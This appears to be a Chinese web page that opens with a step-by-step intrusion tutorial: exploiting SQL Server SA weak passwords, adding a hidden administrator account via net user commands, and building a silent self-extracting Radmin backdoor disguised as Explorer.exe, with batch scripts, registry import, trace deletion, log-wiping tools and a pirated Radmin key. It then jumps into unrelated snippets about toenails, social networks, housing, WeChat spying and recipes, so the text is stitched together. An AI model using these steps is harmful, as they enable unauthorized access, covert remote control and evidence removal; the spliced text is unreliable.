工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码:
08US9A95I lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务的);psu.exe(使用被禁止的Guest帐户要用到的);mstsc.exe(远程桌面连接程序)。
一.扫到SA弱口令(自动攻击器)
二.用SQLTOOLS连上去建一个用户
net start telnet
开telnet服务
net user mint mint /add
添加用户mint密码为
mint net localgroup administrators mint /add
将帐号mint升级为管理员
三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)
*** RAD.EXE过程:
1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe;
2、在本地设置服务端(一定要生成);
设置密码-->>设置连接端口(默认4489)-->>生成
3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg;
4、编写一个批处理,并命名为u.bat;
@echo offnet stop r_server
5、写第二个批处理,r.bat,内容为:
@echo off@Explorer.exe /
uninstall /silence@Explorer.exe /install /
silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /
silence@Explorer.exe /install /silence@regedit /
s 1.reg@net start r_server@del
rad.exe@del 1.reg@del r.bat@del u.bat
6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包;
7、将Rad.rar *** 成自解压文件;
选择Default.sfx的自释放模块-->>高级自释放选项
-->>常规
释放路径:%systemroot%\\system32
安装程序:释放后运行:r.bat 释放前运行u.bat
-->>摸式
缄默模式:全部隐藏 覆盖方式:覆盖所有文件
不只父母需要学习帮新生儿剪指甲、幼童需要学习自己剪指甲,甚至有些成人也不太会剪指甲,常常不小心剪得太深。如果加上鞋子穿得太紧、太久,趾甲嵌进肉里,可能在几天之内就有红、肿、痛的症状,一旦形成肉芽、化脓...
今天我也谈SNS,先看定义,全称Social Networking Services,即社会性网络服务,专指旨在帮助人们建立社会性网络的互联网应用服务。这里说的是“社会性网络”,那么什么是社会性网络呢...
也对美国的自制屋子心存憧憬,号称要去美国抄底买房。美国的屋子真的有那。。 1美元买屋子,更是个笑话。1美元买的是什么屋子?是拖欠大笔贷款和税金的屋子,并不是说,你交1美元,这屋子就是你的了。你要...
每日要闻没有这样的软件。只是有电脑和手机同时在线的可能性。别的没有 有软件可以只要别人的微信号或者手机号就可以同步他的微信吗 有这种软件!只能同一网络抓包。 后台直接同步别人微信犯法吗? 怎么...
夏天快到了,强烈推荐好多个即美味,又好做的家常凉拌菜。 一、拌凉菜水豆腐: 原材料:罐装水豆腐一块 调味品:生抽酱油、糖、辣椒油、芝麻油、醋、香莱末、葱段、蒜泥、炸花生 作法:...
剪力墙是什么(剪力墙是怎么打造的)大家知道剪力墙是怎么建造的吗?那么它有什么用呢?今天我为大家详细介绍这个剪力墙详细施工流程,对大家今后剪力墙施工有所帮助! 随着建筑施工不断深化,施工技术变得更加复...